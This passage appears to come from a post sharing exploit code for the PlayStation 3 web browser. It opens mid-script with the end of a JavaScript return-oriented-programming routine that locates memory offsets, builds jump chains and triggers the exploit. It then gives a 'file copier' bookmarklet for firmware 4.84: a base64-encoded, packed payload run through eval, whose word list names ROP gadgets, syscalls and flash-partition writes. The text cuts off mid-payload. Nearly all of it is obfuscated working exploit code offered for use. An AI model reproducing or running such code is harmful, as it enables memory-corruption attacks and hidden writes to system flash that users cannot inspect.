(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var b=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var c=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var d=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((c===jump_2)&&(d===jump_1)&&(x===xtra_data)&&(b===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){debug=true;debug=false}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);setTimeout(window.close,2000);t_out=0;total_loops=0}initROP(true);');File copier (works on 4.84 only due to size):
Code:
javascript:eval(atob("ZXZhbChmdW5jdGlvbihwLGEsYyxrLGUscil7ZT1mdW5jdGlvbihjKXtyZXR1cm4oYzxhPycnOmUocGFyc2VJbnQoYy9hKSkpKygoYz1jJWEpPjM1P1N0cmluZy5mcm9tQ2hhckNvZGUoYysyOSk6Yy50b1N0cmluZygzNikpfTtpZighJycucmVwbGFjZSgvXi8sU3RyaW5nKSl7d2hpbGUoYy0tKXJbZShjKV09a1tjXXx8ZShjKTtrPVtmdW5jdGlvbihlKXtyZXR1cm4gcltlXX1dO2U9ZnVuY3Rpb24oKXtyZXR1cm4nXFx3Kyd9O2M9MX07d2hpbGUoYy0tKWlmKGtbY10pcD1wLnJlcGxhY2UobmV3IFJlZ0V4cCgnXFxiJytlKGMpKydcXGInLCdnJyksa1tjXSk7cmV0dXJuIHB9KCdwIFQsMTUsMTcsMTgsMW8sMWYsMWcsMWgsMVI9ITEsNGk9IjRqIiwxQz1bXSxYPTAsTT03MCozMSwxcD00ayxHPTIqMUQsMUU9MCwxOT0wLHc9NGwsMXE9MCwycj0yMCwxRj0wLFk9NG0sNG49NG8sbz00cCwxYT0wLDRxPTEsNHI9MiwxUz00LDFyPTgsMUQ9NHMsMXM9NDAsMzM9NHQsNHU9NHYsMzQ9NHcsMzU9NHgsMzY9NHksMnM9NHosMzc9NEEsMnQ9NEIsMXM9NEMsMzg9NEQsWj0iPFo+IiwxVCwxVSwydT1cJzRFOjRGXCcsMnY9XCc0R1wnLDJ3PVwnLzJ4XCcsMnk9NEgsMzk9NEksMXQ9MCwxVj0wLDFXPTAsMVg9MCwxWT0wLDFaPTAsMjE9MCwyMj0wLDF1PTAsMXY9MCwyMz0wLDJ6PTAsM2E9NEosWj0iPFo+IiwxMj0iPDEyPiIsM2I9WisiPFU+PGI+NEsgNEwgM2MhPC9VPjwvYj4iLDNkPVorIjxVPjxiPjRNIDFiLi4uICIsM2U9XCclPC9iPjwvVT5cJywyQT00Tiw0Tz00UCw0UT00Uiw0Uz00VCw0VT00Viw0Vz00WCw0WT0wLDNmPTRaLDUxPTUzLDU0PTU1LDU2PTU3LDU4PTU5LDVhPTViLDVjPTVkLDNnPTVlLDVmPTVnLDJCPTVoLDFHPTVpLDFjPTVqLDJDPTVrLDNoPTVsLDJEPTVtLDNpPTVuLDNqPTVvLDFpPTVwLDNrPTVxLDNsPTVyLDNtPTVzO0IuNXQoXCc8M24+PDNvPjJFIC0gM3AgMjUgM3E8LzNvPjxVPjJFIC0gM3AgMjUgM3EgM3IgNXUgQCA1di01dy41eDwvVT48M3M+NXkgNXogM3IgNUEgMkU6IFcsIDVCLCA1QywgNUQ8LzNzPjxaPjwxMj48Yj41RSAzdCAzdTogPC9iPjwyNiBEPSIyRiIgM3Y9IjN3KCkiPjx5IEQ9IjVGIiAyNz0iMjciIEU9Ii8yOC8iPi8yOC88L3k+PHkgRD0iNUciIEU9Ii8yOS8iPi8yOS88L3k+PHkgRD0iNUgiIEU9Ii8yYS8iPi8yYS88L3k+PHkgRD0iNUkiIEU9Ii8yRy8iPi8yRy88L3k+PHkgRD0iNUoiIEU9Ii8xdy8iPi8xdy88L3k+PHkgRD0iNUsiIEU9Ii8zeC8iPi8zeC88L3k+PC8yNj48Yj4gPC9iPjwyYiAyYz0iM3kiIEQ9IjJkIiAySD0iMmQiIDN6PSIzQSIgM0I9IjUwIj48MTI+PDEyPjxiPjVMIDN0IDN1OiA8L2I+PDI2IEQ9IjJJIiAzdj0iM0MoKSI+PHkgRD0iNU0iIDI3PSIyNyIgRT0iLzJhLyI+LzJhLzwveT48eSBEPSI1TiIgRT0iLzI4LyI+LzI4LzwveT48eSBEPSI1TyIgRT0iLzI5LyI+LzI5LzwveT48eSBEPSI1UCIgRT0iLzJ4LyI+LzJHLzwveT48eSBEPSI1USIgRT0iLzF3LyI+LzF3LzwveT48LzI2PjxiPiA8L2I+PDJiIDJjPSIzeSIgRD0iMmUiIDJIPSIyZSIgM3o9IjNBIiAzQj0iNTAiPjwxMj48MTI+PDNEPjwyYiAyYz0iNVIiIEQ9IjNFIiAySD0iNVMiIDJmPSIyZiI+NVQtNVU8LzNEPjwxMj48MTI+PDNGIDVWPSIiPjwyYiAyYz0iNVciIEU9IjVYIiA1WT0iMkooTikiLz48LzNGPjwxeCBEPSIzRyI+PC8xeD48MXggRD0iMWIiPjwvMXg+PDF4IEQ9IjFIIj48LzF4PjwvNVo+PC8zbj5cJyk7ciAzdygpe3AgYT1CLkYoIjJGIikuRTs5KGE9PSIvMXcvIilCLkYoIjJkIikuRT0iM0gvM0kuM0oifXIgM0MoKXtwIGE9Qi5GKCIySSIpLkU7OShhPT0iLzF3LyIpQi5GKCIyZSIpLkU9IjNILzNJLjNKIjs5KGE9PSIvMngvIik2MCgiNjE6IDYyIDNLIDYzIDY0IDY1IDY2IDY3IDY4IDNLIGEgNjkgNmEuIDZiIDZjIDZkIDZlIDZmLiIpfXIgMksoYSl7cCBiPUIuNmcoIjZoIik7MUkocCB4PTA7eDxiLkE7eCsrKXtiW3hdLjZpPWF9fXIgM0woYSxiKXs5KGEpe2EuM009Yn19ciAyZyhhKXszTChCLkYoXCczR1wnKSxhKTs5KGEuNmooIjZrIikhPS0xKXsySygyTCl9fXIgM04oYSxiLGMpe3AgZD1ULlEoMVRbMF0sMikuMUooTik7cCBlPVQuUSgxVVswXSwyKS4xSihOKTtwIGY7OSgoVihkLDE2KSE9PTApJiYoVihkLDE2KT09PShWKGUsMTYpKSkpe3AgZz1CLkYoXCc2bFwnKTs5KGcpezkoZy4yZj09PU4pNm0uNm4oKX1mPWF9MTN7OShjKXs5KChWKGQsMTYpIT09VihlLDE2KSl8fChWKGQsMTYpPT09MCkpYis9Y31mPWJ9MmcoZil9ciAzTyhhKXtxIDcoMWMpK3UoTyxvKSs3KHcpKzcoYSkrSihJLG8pKzcoM2spfXIgM1AoYSxiLGMsZCxlLGYpe3AgZz1CLkYoXCczRVwnKTtwIHQ9W1wnXCcsXCdcJyxcJ1wnLFwnXCcsXCdcJ107OShiKXRbMF09MWooYitILGErQywxaSk7OShjKXRbMV09MWooYytILGErQywxaSk7OShkKXRbMl09MWooZCtILGErQywxaSk7OShlKXRbM109MWooZStILGErQywxaSk7OShmKXRbNF09MWooZitILGErQywxaSk7OShnKXs5KGcuMmY9PT1OKXEgdFswXSt0WzFdK3RbMl0rdFszXSt0WzRdKzNPKGEpfXFcJ1wnfXIgMk0oYSxiLGMsZCxlLGYsZyxoLGksail7OShqPT09Uil7aj13fXEgNygxYykrdShPLG8pKzcodykrdShDLG8pKzcoMUcpK3UoMUssbykrUCgxayxvKSt2KGEpK3YoaSkrdihnKSt2KGYpK3YoZSkrdihkKSt2KGMpK1AoSCxvKSt2KGgpK3UoMUwsbykrNyhiKSt1KEMsbykrNygyRCkrdShPLG8pKzcoaikrNyhZKStKKEksbyl9ciAyTihhLGIsYyxkLGUsZixnLGgsaSxqKXs5KGo9PT1SKXtqPXd9cSA3KDFjKSt1KE8sbykrNyh3KSt1KEMsbykrNygxRykrdSgxSyxvKStQKDFrLG8pK3YoYSkrdihpKSt2KGcpK3YoZikrdihlKStQKEgsbykrdihjKStQKEgsbykrdihoKSt1KEMsbykrNyhkLUgpKzcodykrSig2byxvKSs3KDNpKSt1KDZwLG8pKzcoYikrdShDLG8pKzcoMkQpK3UoTyxvKSs3KGopKzcoWSkrSihJLG8pfXIgM1EoYSxiLGMsZCxlLGYsZyxoLGksail7cSAyTyhoKzFzLGksMXIpKzFsKDM4LGEsaCwwLDAsMCwwLDAsMCkrMk8oaixoKzFzLDFTKSsxbCgydCxhLDMzLGMsMCwwLDAsMCwwKSsyTigzNyxjLGUsaCsxcyxmLDAsMCwwLDAsMCwwKSsyTSgycyxjLDAsMCwwLDAsMCwwLDAsMCwwKSsxaihmK0gsYiwwKSsxbCgydCxiLDM2LGQsMzUsaSwwLDAsMCkrMk4oMzQsZCxlLGgrMXMsZywwLDAsMCwwLDAsMCkrMk0oMnMsZCwwLDAsMCwwLDAsMCwwLDAsMCl9ciAzUihhLGIsYyxkLGUsZixnKXtxIDcoMkMpK3UoTyxvKSs3KHcpKzcoYS1JKSs3KHcpK3UoQyxvKSs3KDNtKSt1KDFLLG8pK0ooSSxvKSs3KGIpKzcoYykrNyhkKSs3KGUpKzcoZikrNyhnKSs3KFkpK0ooSSxvKX1yIDFqKGEsYixjLGQsZSxmKXs5KGQ9PT1SKXtkPXd9OShlPT09Uil7ZT13fTkoZj09PVIpe2Y9d31xIDNSKGEsdyx3LHcsdyxiLHcpKzcoM2wpK3UoMU0sMWEpK0ooSSwxYSkrNyhjKSt1KEMsMWEpKzcoZCkrNyhlKSs3KGYpKzcoYykrSihJLG8pfXIgNnEoYSl7cSA3KFkpK0ooSSxvKSsyaCgyQiwyLDAsMCwwLDAsMCwwLDAsMCwzUykrMWwoMnksYSwwLDAsMCwwLDAsMCwwKX1yIDNUKGEpezkoYSl7cSBhLjZyfX1yIDNVKGEpezkoYSl7cSAzVChhKX19ciAzVihhKXs5KGEpe3EgYS5FfX1yIDJQKGEpezkoYSl7cSAzVihhLjZzWzNVKGEpXSl9fXIgM1coKXtxIDJQKEIuRihcJzJGXCcpKX1yIDJRKGEpe3EgM1coKSthfXIgM1goKXtxIDJQKEIuRihcJzJJXCcpKX1yIDJSKGEpe3EgM1goKSthfXIgM1koYSxiLGMsZCxlKXs5KGE9PT1OKXsxRj0wOzFFPTA7MTk9MH05KFghPT0wKXszWihYKTtYPTB9MUM9W107MVQ9W107MVU9W107MW89MDsxZj0wOzFnPTA7MWg9MDtNPTcwKjMxOzFwPWI7Rz1jOzFFPWQ7MTk9ZTsxcSsrfXIgMWQoYSl7cSBTLjJpKGEpfXIgdihhKXtxIFMuMmkoYT4+MTYpK1MuMmkoYSl9ciA3KGEpe3EgdigwKSt2KGEpfVMuMW0uNDE9cigpe3EoXCcyU1wnK0spLlEoLTQpfTtTLjFtLjFKPXIoYSl7cCBiPVwnXCc7cCBpPTA7TChpPEsuQSl7OShhPT09Til7Yis9Sy4xeShpKS4yaigxNikuNDEoKX0xM3tiKz1LLjF5KGkpLjJqKDE2KX1pKz0xfXEgYn07Uy4xbS4xej1yKGEpezkoSy5BPDEpe3FcJ1wnfXAgYj1cJ1wnO3AgYz1cJ1wnO3AgaT0wO3AgZD1bXTs5KGE9PT1OKXtiPUt9MTN7Yj1LLjFKKCl9TCgoYi5BJTQpIT09MCl7Yis9XCcya1wnfTkoYi5RKGIuQS0zLDIpIT09XCcya1wnKXtiKz1cJzJTXCd9TChpPGIuQSl7Yz1iLlEoaSw0KTtkLjJUKFMuMmkoVihjLDE2KSkpO2krPTR9cSBkLjJVKFwnXCcpfTtTLjFtLjFBPXIoYSl7OShLLkE8MSl7cSAwfXAgYj1cJ1wnOzkoYT09PU4pe2I9S30xM3tiPUsuMUooKX1MKChiLkElNCkhPT0wKXtiKz1cJzJrXCd9OShiLlEoYi5BLTMsMikhPT1cJzJrXCcpe2IrPVwnMlNcJ31xIGIuQS8yfTtTLjFtLjFOPXIoYSxiKXtxIEsuUSgwLGEpK2IrSy5RKGErYi5BKX07Uy4xbS4ybD1yKGEpe3EgNDIgNDMoYSsxKS4yVShLKX07NDQuMW0uNDU9cigpe3AgYT1TKEspLjZ0KC9bNnVdLyk7OShhLkE9PT0xKXtxIGFbMF19cCB6PVwnXCcsNDY9SzwwP1wnLVwnOlwnXCcsMm09YVswXS40NyhcJy5cJyxcJ1wnKSwxTz00NChhWzFdKSsxOzkoMU88MCl7ej00NitcJzAuXCc7TCgxTysrKXt6Kz1cJzBcJ31xIHorMm0uNDcoL15cXC0vLFwnXCcpfTFPLT0ybS5BO0woMU8tLSl7eis9XCcwXCd9cSAybSt6fTtyIDQ4KGEsYixjKXtwIGQ9MDtwIGc9W107cCBpO3AgajtwIGg7MUkoaT1hLkE7aTtpLT0xKXtoPWFbaS0xXTsxSShqPTg7ajtqLT0xKXtnLjJUKGglMj8xOjApO2g9aD4+MX19Zy42digpO3Agaz1nLjJVKFwnXCcpO3AgbD0oMTw8KGItMSkpLTE7cCBzPVYoay4yVigwLDEpLDIpPy0xOjE7cCBlPVYoay4yVigxLDErYiksMik7cCBmPVYoay4yVigxK2IpLDIpOzkoZT09PSgxPDxiKS0xKXtkPWYhPT0wPzZ3OnMqNnh9MTMgOShlPjApe2Q9cyoybi4ybygyLGUtbCkqKDErZi8ybi4ybygyLGMpKX0xMyA5KGYhPT0wKXtkPXMqMm4uMm8oMiwtKGwtMSkpKihmLzJuLjJvKDIsYykpfTEze2Q9cyowfXEgZC40NSgpfXIgNDkoYSxiKXtwIGM9NDIgNDMoKGE+PjI0KSYxZSwoYT4+MTYpJjFlLChhPj44KSYxZSwoYSkmMWUsKGI+PjI0KSYxZSwoYj4+MTYpJjFlLChiPj44KSYxZSwoYikmMWUpO3EgNDgoYywxMSw1Mil9ciA0YShhLGIpe3Agbj0oYTw8MzIpfCgoYj4+MSktMSk7cSA0OShhLChuLWEpKX1yIDJXKGEsYil7OShCLkYoXCcxYlwnKSl7Qi5GKFwnMWJcJykuMUIuMnA9IjZ5KCIrNGEoYSxiKSsiKSJ9fXIgMVAoYSxiLGMpezkoQi5GKFwnMWJcJykpezJXKGEsYik7OSgxUj09PU4pe3AgeD1CLkYoXCcxYlwnKS4xQi4ycC5RKDYsYyk7cSB4fXEgQi5GKFwnMWJcJykuMUIuMnAuUSg2LGMpfX1yIDFIKGEpezkoQi5GKFwnMUhcJykpe0IuRigiMUgiKS4zTT0tNnooIjZBKDZCIithLjJqKDE2KSsiKSIpfX1yIDE0KCl7OSgxcTwycil7MmcoM2QrKCg2Qy8ycikqMXEpLjJqKCkrM2UpO1g9MlgoMkosNGIsMkwpfTEzezFxPTA7MmcoM2IpO1g9MH19ciAxUShhLGIsYyxkKXsyVyhjLGQpO3AgZT1CLkYoXCcxYlwnKS4xQi4ycC5RKDYsZCk7cCBpPTA7cCB0O3AgaztwIGY7cCBnO0woaTwoZS5BKjIpKXs5KGUuMXkoaS8yKT09PWIuMXkoMCkpe2Y9MDsxSShrPTA7azwoYi5BKjIpO2srPTZEKXs5KGUuMXkoKGkraykvMikhPT1iLjF5KGsvMikpezZFfWYrPTF9OShmPT09Yi5BKXtnPWMraSs0OzFJKHQ9MDt0PDFDLkE7dCs9MSl7OSgxQ1t0XT09PWcpe3EtMX19MUMuMlQoZyk7cSBnfX1pKz1DfXAgaD1jK2Q7cSAwfXIgMk8oYSxiLGMpe3EgMmgoM2csYSxiLGMsMCwwLDAsMCwwLDAsMU0pfXIgNkYoYSxiLGMsZCxlKXs5KGM9PT1SKXtjPXd9OShkPT09Uil7ZD13fTkoZT09PVIpe2U9d31xIDcoMkMpK3UoTyxvKSs3KGIpK0ooSSxvKSs3KGEtNkcpK3UoQyxvKSs3KDNqKSt1KDFNLG8pKzcoYykrNyhkKSs3KGUpKzcoWSkrSihJLG8pfXIgNGMoKXtxIDFuKCJcXDRkXFw2SCIpK3YoM2YpK3YoMkEpK3UoMUwsbykrNygyQSkrdSgxTSxvKX1yIDRlKCl7cSA3KDFpKSsxbigiXFw2SSIpfXIgMWwoYSxiLGMsZCxlLGYsZyxoLGksail7OShqPT09Uil7aj13fXEgNygxYykrdShPLG8pKzcodykrdShDLG8pKzcoMUcpK3UoMUssbykrUCgxayxvKSt2KGEpK3YoaSkrdihnKSt2KGYpK3YoZSkrdihkKSt2KGMpK1AoSCxvKSt2KGgpK3UoMUwsbykrNyhiKSt1KEMsbykrNygxYykrdShPLG8pKzcodykrdShDLG8pKzcoM2gpK3UoTyxvKSs3KGopKzcoWSkrSihJLG8pfXIgMmgoYSxiLGMsZCxlLGYsZyxoLGksaixrLGwsbSl7cCBuPTFMOzkobT09PVIpe209d305KGw9PT1SKXtsPXd9cSA3KDFjKSt1KE8sbykrNyh3KSt1KEMsbykrNygxRykrdSgxSyxvKStQKDFrLG8pK3YoaikrdihpKSt2KGcpK3YoZikrdihlKSt2KGQpK3YoYykrUChILG8pK3YoaCkrdSgxTCxvKSs3KGIpK3UoQyxvKSs3KDFjKSt1KE8sbykrNyhsKSt1KEMsbykrNyhhKSt1KGstbiwxYSkrNyhtKSs3KFkpK0ooSSxvKX1yIFAoYSxiKXtwIGM9XCdcJztwIGQ9MDtwIGU9MWQoYik7TChkPGEvNCl7Yys9ZS4ybCgyKTtkKyt9cSBjfXIgSihhLGIpe3AgYz1cJ1wnO3AgZD0wO3AgZT0xZChiKTtMKGQ8YS84KXtjKz1lLjJsKDQpO2QrK31xIGN9ciB1KGEsYil7cCBjPVwnXCc7cCBkPTA7cCBlPTFkKGIpO0woZDxhLzE2KXtjKz1lLjJsKDgpO2QrK31xIGN9ciAySihhKXsySyhOKTs2SnszWShhLDZLLDUvMioxRCwwKjFELDAqMUQpO3AgYj02TDsyWT1CLkYoIjJkIikuRTsyWj1CLkYoIjJlIikuRTtUPTJ1LjF6KCkrMnYuMXooKSsydy4xeigpKzJRKDJZKS4xeigpK1AoMWssMWEpKzJSKDJaKS4xeigpK1AoMWssMWEpK3UoMU0sMWEpKzcoWSkrSihJLG8pKzJoKDJCLDIsMCwwLDAsMCwwLDAsMCwwLDNTKSsxbCgyeSwzOSwwLDAsMCwwLDAsMCwwKSsxbigiXFw2TSIpO0woMW89PT0wKXs5KE08Ryl7MTQoKTtxfVQ9VC4xTigwLDFkKDZOKSk7MW89MVEoIlQiLFQsMXAsRyk7TS09R30xdD0xbzsxVj0xdCsydS4xQSgpLUg7MVc9MVYrMnYuMUEoKTsxWD0xVysydy4xQSgpOzFaPTFYKzJRKDJZKS4xQSgpOzFZPTFaKzFTOzIxPTFZKzFyOzIyPTIxKzJSKDJaKS4xQSgpOzF1PTIyKzFTOzFUWzBdPSgxdS0xdCtJKS8yOzF2PTF1KzFyOzFVWzBdPSgxdi0xdCsxaykvMjsyMz0xdisxcio2Tzsyej0yMysxcio2UDsxNT00YygpKzFsKDNhLDF0LDFWLDFXLDAsMCwwLDAsMCkrM1EoMVgsMjEsMVosMjIsYiwxWSwxdSwyMywxdiwxditJKSszUCgyeiwxdSkrNGUoKTtMKDFmPT09MCl7OShNPEcrMTkpezFGKys7OSgoMUYlMTApPT09MCl7MUUrPTA7MTkrPTB9MTQoKTtxfTE1PTE1LjFOKDAsMWQoNlEpKTsxZj0xUSgiMTUiLDE1LDFwKzFFLEcrMTkpOzkoMWY9PS0xKTkoTTxHKzE5KXsxRisrOzE0KCk7cX1NLT1HKzE5fTE3PTFuKCJcXDZSXFw2UyIpK3UoNlQsNlUpK3YoMWYpKzFuKCJcXDZWIik7TCgxZz09PTApezkoTTxHKXsxNCgpO3F9MTc9MTcuMU4oMCwxZCg2VykpOzFnPTFRKCIxNyIsMTcsMXAsRyk7OSgxZz09LTEpOShNPEcpezE0KCk7cX1NLT1HfTE4PTFuKCJcXDRkXFw2WCIpK3YoMWcpKzFuKCJcXDZZIik7TCgxaD09PTApezkoTTxHKXsxNCgpO3F9MTg9MTguMU4oMCwxZCg2WikpOzFoPTFRKCIxOCIsMTgsMXAsRyk7OSgxaD09LTEpOShNPEcpezE0KCk7cX1NLT1HfXAgYz0xUCgxZi1ILDcxLDE1LkEpO3AgeD0xUCgxby1ILDMwLFQuQSk7cCBkPTFQKDFnLUgsMzAsMTcuQSk7cCBmPTFQKDFoLUgsMzAsMTguQSk7OSgoZD09PTE3KSYmKGY9PT0xOCkmJih4PT09VCkmJihjPT09MTUpKXs5KFghPT0wKXszWihYKX00ZigpfTEzezE0KCl9fTcyKGUpezFSPU47MVI9Mkx9fXIgNGYoKXsyWCgxSCw0YiwxaCk7MlgoM04sNzMsWisiPFU+PGI+PDJxIDFCPVwnNGc6NzRcJz4yNSA0aCA3NSE8L2I+PC9VPjwvMnE+IixaKyI8VT48Yj48MnEgMUI9XCc0Zzo3NlwnPjI1IDRoIDNjITwvYj48L1U+PC8ycT4iLCIiKTtYPTA7MXE9MH0nLDYyLDQ0MSwnfHx8fHx8fGhleGR3MmJpbnx8aWZ8fHx8fHx8fHx8fHx8fHxkYnl0ZTQxfHZhcnxyZXR1cm58ZnVuY3Rpb258fHxmaWxsX2J5XzE2Ynl0ZXN8aGV4dzJiaW58Z3RlbXBfYWRkcnx8b3B0aW9ufHxsZW5ndGh8ZG9jdW1lbnR8MHgxMHxpZHx2YWx1ZXxnZXRFbGVtZW50QnlJZHxzZWFyY2hfc2l6ZXwweDR8MHg4fGZpbGxfYnlfOGJ5dGVzfHRoaXN8d2hpbGV8c2VhcmNoX21heF90aHJlc2hvbGR8dHJ1ZXwweDYwfGZpbGxfYnlfNGJ5dGVzfHN1YnN0cnxudWxsfFN0cmluZ3x4dHJhX2RhdGF8aDF8cGFyc2VJbnR8fHRfb3V0fHNwX2V4aXR8aHJ8fHxicnxlbHNlfGxvYWRfY2hlY2t8c3RhY2tfZnJhbWV8fGp1bXBfMnxqdW1wXzF8c2VhcmNoX3NpemVfZXh0fGRieXRlMDB8ZXhwbG9pdHxnYWRnZXRfbW9kMl9hZGRyfGhleGgyYmlufDB4RkZ8c3RhY2tfZnJhbWVfYWRkcnxqdW1wXzJfYWRkcnxqdW1wXzFfYWRkcnxnYWRnZXRfbW9kOF9hZGRyfHZhbGlkYXRlX3dvcmRfZnJvbV9wdHJ8MHhDfHN5c2NhbGx8cHJvdG90eXBlfHVuZXNjYXBlfHh0cmFfZGF0YV9hZGRyfHNlYXJjaF9iYXNlfHRvdGFsX2xvb3BzfGR3b3JkX3NpemV8c3RhdF9zaXplX29mZnNldHxmbGFzaF9wYXJ0aXRpb25fYWRkcnx0ZW1wbGF0ZV8xX2ZpbGVfYmxpbmRfd3JpdGVsZW5fYWRkcnxudWxsX2FkZHJ8ZGV2X2ZsYXNoMnxkaXZ8Y2hhckNvZGVBdHxjb252ZXJ0fGNvbnZlcnRlZFNpemV8c3R5bGV8b2Zmc2V0X2FycmF5fG1ieXRlc3xzZWFyY2hfYmFzZV9vZmZ8ZnJhbWVfZmFpbHN8Z2FkZ2V0X21vZDFfYWRkcnx0cmlnZ2VyfGZvcnx0b0FzY2lpfDB4NTB8MHgyMHwweDcwfHJlcGxhY2VBdHxtYWd8Y2hlY2tNZW1vcnl8ZmluZEpzVmFyaWFibGVPZmZzZXR8ZGVidWd8d29yZF9zaXplfHN0b3JlX2lkeF9hcnIxfHN0b3JlX2lkeF9hcnIyfGZzX2FkZHJ8bW91bnRfcGF0aF9hZGRyfHRlbXBsYXRlXzFfZmlsZV91c2JfYWRkcnx0ZW1wbGF0ZV8xX2ZpbGVfdXNiX3JlYWRsZW5fYWRkcnx0ZW1wbGF0ZV8xX2ZpbGVfdXNiZmRfYWRkcnx8dGVtcGxhdGVfMV9maWxlX2JsaW5kX2FkZHJ8dGVtcGxhdGVfMV9maWxlX2JsaW5kZmRfYWRkcnxzdGF0X2FkZHJ8fEZpbGV8c2VsZWN0fHNlbGVjdGVkfGRldl91c2IwMDB8ZGV2X3VzYjAwMXxkZXZfaGRkMHxpbnB1dHx0eXBlfHNyY2ZpbGV8ZGVzZmlsZXxjaGVja2VkfHNob3dSZXN1bHR8Y2FsbHN1Ynxmcm9tQ2hhckNvZGV8dG9TdHJpbmd8MDB8cmVwZWF0fHN0cnxNYXRofHBvd3xzcmN8c3BhbnxtYXhfbG9vcHN8c2NfZnNfY2xvc2V8c2NfZnNfb3BlbnxmbGFzaF9wYXJ0aXRpb258ZmlsZXN5c3RlbXxtb3VudF9wYXRofGRldl9ibGluZHxzY19zbV9zaHV0ZG93bnxyZWJvb3Rfc2ZfYWRkcnx0b2NfYWRkcnxnYWRnZXQxMl9hZGRyfGdhZGdldF9tb2QzX2FkZHJ8Z2FkZ2V0X21vZDRiX2FkZHJ8UFMzWHBsb2l0fGNvbWJvZmlsZVBhdGh8ZGV2X2ZsYXNofG5hbWV8ZGVzcGF0aHxpbml0Uk9QfGRpc2FibGVpbnB1dHxmYWxzZXxzeXNjYWxsX3IzX3AycHxzeXNjYWxsX3IzcjVfcDJwfG1lbWNweXxnZXRDb21ib1NlbGVjdGVkVmFsdWV8Z2V0UGF0aHxnZXRQYXRoMnwwMDAwfHB1c2h8am9pbnxzdWJzdHJpbmd8cmVhZE1lbW9yeXxzZXRUaW1lb3V0fHRlbXBsYXRlXzFfZmlsZV91c2J8dGVtcGxhdGVfMV9maWxlX2JsaW5kfDB4MTAwMHwweDEwMDAwMHx8ZnNfZmxhZ19yZWFkb25seXxzY19mc193cml0ZXxmc19tb2RlfGZzX2ZsYWdfY3JlYXRlfHNjX2ZzX3JlYWR8c2NfZnNfc3RhdHxoYXJkX3JlYm9vdHxzY19mc191bW91bnR8ZmFpbF9tc2dfZnJhZ3xmYWlsZWR8cHJvZ3Jlc3NfbXNnX2ZyYWcxfHByb2dyZXNzX21zZ19mcmFnMnxnYWRnZXQxX2FkZHJ8Z2FkZ2V0OF9hZGRyfGdhZGdldF9tb2Q0YV9hZGRyfGdhZGdldF9tb2Q0Y19hZGRyfGdhZGdldF9tb2Q3X2FkZHJ8Z2FkZ2V0X21vZDlfYWRkcnxnYWRnZXRfbW9kMTJfYWRkcnxnYWRnZXRfbW9kMTVfYWRkcnxodG1sfHRpdGxlfE9mZmxpbmV8Q29waWVyfGJ5fGgyfGZpbGV8cGF0aHxvbmNoYW5nZXxjaGVja3B8ZGV2X2JkdmR8dGV4dHxtYXhsZW5ndGh8MjAwfHNpemV8Y2hlY2twMnxsYWJlbHxhdXRvX3JlYm9vdHxmb3JtfHJlc3VsdHxldGN8eFJlZ2lzdHJ5fHN5c3x0b3xzZXRJbm5lckhUTUx8aW5uZXJIVE1MfHJvcF9leGl0XzF2YWx8c3RhY2tfZnJhbWVfc3dhcHxvcHRpb25hbF9yZWJvb3RfbmV3fGNvcHlfZmlsZV9vdmVyd3JpdGV8bG9hZF9yM193b3JkX2Zyb21fcHRyXzMyfDB4ODB8Z2V0SW5kZXh8Z2V0Q29tYm9TZWxlY3RlZEluZGV4fGdldFZhbHVlfGdldHJvb3RQYXRofGdldHJvb3RQYXRoMnxpbml0X3J1bnxjbGVhclRpbWVvdXR8fHRvSGV4MTZ8bmV3fEFycmF5fE51bWJlcnxub0V4cG9uZW50c3xzaWdufHJlcGxhY2V8ZnJvbUlFRUU3NTR8Z2VuZXJhdGVJRUVFNzU0fGdlbmVyYXRlRXhwbG9pdHwxMDAwfHN0YWNrX2ZyYW1lX2hvb2t1cHx1NDE0MXxzdGFja19mcmFtZV9leGl0fHRyaWdnZXJYfGNvbG9yfGNvcHl8c3RhcnRfeHx4eHh4fDB4ODAxMDAwMDB8MHg4RDAwMDAwMHwyNDEzMzU0MTc2fGZmc3w0Mjk0OTY3Mjk1fDE2NzA1fGJ5dGVfc2l6ZXxod29yZF9zaXplfDEwNDg1NzZ8MHgwfHRlbXBsYXRlXzFfZmlsZV9idWZfYWRkcnwweDhCMDAwMDAwfDB4MzIzfDB4MUI2fDB4MjQxfDB4MzI0fDB4MzIyfDB4MzIxfDB4Mjh8MHgzMjh8eHh4eENFTExfRlNfSU9TfEJVSUxUSU5fRkxTSDF8Q0VMTF9GU19GQVR8MHgxN0J8MHgxMjAwfDB4MzQ1fEV4cGxvaXR8aW5pdGlhbGl6YXRpb258SW5pdGlhbGl6aW5nfDcyOTYzNDR8dG9jX2VudHJ5MV9hZGRyfDcxODUzNjB8dG9jX2VudHJ5Ml9hZGRyfDc0OTQ0NTZ8dG9jX2VudHJ5M19hZGRyfDcxODUzNTJ8dG9jX2VudHJ5NF9hZGRyfDc2MDIxNzZ8dG9jX2VudHJ5NV9hZGRyfDcyNTU3NTJ8dG9jX2VudHJ5Nl9hZGRyfDYyMDAzNnx8Z2FkZ2V0Ml9hZGRyfHw2MzMyNjQ0fGdhZGdldDNfYWRkcnw4NzI1NDB8Z2FkZ2V0NF9hZGRyfDIyNjcxOTJ8Z2FkZ2V0NV9hZGRyfDEyMjc1NDh8Z2FkZ2V0Nl9hZGRyfDYzODA3NjR8Z2FkZ2V0N19hZGRyfDEzMTAyNHwxMzEwNzJ8Z2FkZ2V0MTFfYWRkcnw1ODc0ODY0fDgyMDgxMnw2MzUyODU2fDgwNzU2fDc1NzI0OHw4OTA1MDB8NDM3NjQ0MHwzNDY4NjR8MTA4MjA0fDI4NjIyNjR8NjgzODR8NjUwMDg2MHwzNzg4ODU2fHdyaXRlfGxtbjd8cHN4fHB